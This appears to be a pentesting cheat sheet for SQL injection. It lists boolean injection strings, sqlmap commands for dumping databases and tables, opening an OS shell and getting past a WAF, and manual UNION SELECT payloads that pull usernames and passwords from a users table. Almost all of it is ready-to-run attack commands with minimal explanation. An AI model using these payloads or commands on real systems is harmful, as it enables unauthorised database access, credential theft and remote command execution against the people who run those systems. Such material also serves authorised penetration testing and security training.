Skip to main content

Detection

Test with single quotes and boolean conditions: a syntax error or changed response confirms the injection point. 
' OR '1'='1
' OR 1=1--
") OR ("1"="1
') OR ('1'='1

sqlmap

Let sqlmap automate discovery and extraction: use -r with a saved Burp request for the cleanest results. 
# Basic
sqlmap -u "http://<IP>/page?id=1" --batch

# POST
sqlmap -u "http://<IP>/login" --data="user=admin&pass=test" --batch

# From Burp request
sqlmap -r request.txt --batch

# Dump
sqlmap -u "http://<IP>/page?id=1" --dbs --batch
sqlmap -u "http://<IP>/page?id=1" -D <db> --tables --batch
sqlmap -u "http://<IP>/page?id=1" -D <db> -T <table> --dump --batch

# OS shell
sqlmap -u "http://<IP>/page?id=1" --os-shell --batch

# WAF bypass
sqlmap -u "http://<IP>/page?id=1" --tamper=space2comment --batch

Manual Union-Based

Determine the column count with ORDER BY, then use UNION SELECT to extract data: null-fill until the count matches. 
ORDER BY 1--
ORDER BY 2--
UNION SELECT NULL,NULL,NULL--
UNION SELECT username,password,NULL FROM users--